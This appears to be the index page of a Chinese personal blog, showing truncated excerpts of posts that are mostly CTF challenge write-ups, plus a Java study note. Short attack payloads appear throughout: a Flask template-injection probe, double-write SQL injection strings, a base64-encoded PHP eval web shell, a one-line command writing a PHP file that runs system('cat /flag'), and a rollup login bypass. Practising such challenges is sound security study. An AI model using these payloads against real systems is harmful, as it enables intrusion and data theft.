满秋

序言 一周或两周前买了从零学JAVA PHP 从入门到精通几本书,正好空下来咕咕咕,学习下。也补一下期末(mac配置idea无敌!!! 基础知识 JAVA语言基础 拿到一门语言肯定是要先hello world了。 public class helloworld { public s...

发布 1 条评论

这题打起来麻烦的一批,开了七八九十十一二个靶机才打通,确实给👴打吐了 打开给了源码 <?php class dir{ public $userdir; public $url; public $filename; public function __construct($url,$filename) { ...

发布 0 条评论

[CSCCTF 2019 Qual]FlaskLight 题目名称直接告诉你flask了。直接测试了 {{config}}可以返回一些有用信息 {{''.__class__.__mro__[2].__subclasses__()}} 查询出了所有可以使用的类 https://zhuanlan.zhihu.com/p/93746437 遍历可以利...

发布 0 条评论

打开靶机发现是一个文件上传页面,测试后发现可以读源码 <?php //show_source(__FILE__); include "base.php"; header("Content-type: text/html;charset=utf-8"); error_reporting(0); function upload...

发布 0 条评论

Easy_sqli 简单的注入,过滤了东西双写绕就行 import requests import time ​ table ="(selselectect group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema regexp database())" ​ column="(sesel...

发布 2 条评论

  [GKCTF2020]CheckIN 传入的参数会base64解密,所以加密直接传个shell url?Gingo=ZXZhbCgkX1BPU1RbJ2NtZCddKTs= 蚁剑连接有disable_function,插件绕不过去。传个php文件包含执行下根目录的/readflag 找到一个不知道啥时候存的ph...

发布 0 条评论

帮帮小红花 shell_exec 反弹shell弹不回来没通外网。命令盲注?太麻烦了 结果直接写一个新文件。 echo "<?php system('cat /flag')?>" > ha1c9on.php MD5下就是flag 非预期。预期解应该是命令盲注 import request...

发布 0 条评论

今天有空系统学习下php反序列化的内容 反序列化: 有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不...

发布 0 条评论

这题的第一步考点在某入群题见过。 1' or '1'='1' group by passwd with rollup having passwd is NULL # 可以登录成功,扫目录的时候发现wsdl.php 然后在主页发现method=user 所以猜测是功能,先尝试用get_flag method can useget_f...

发布 0 条评论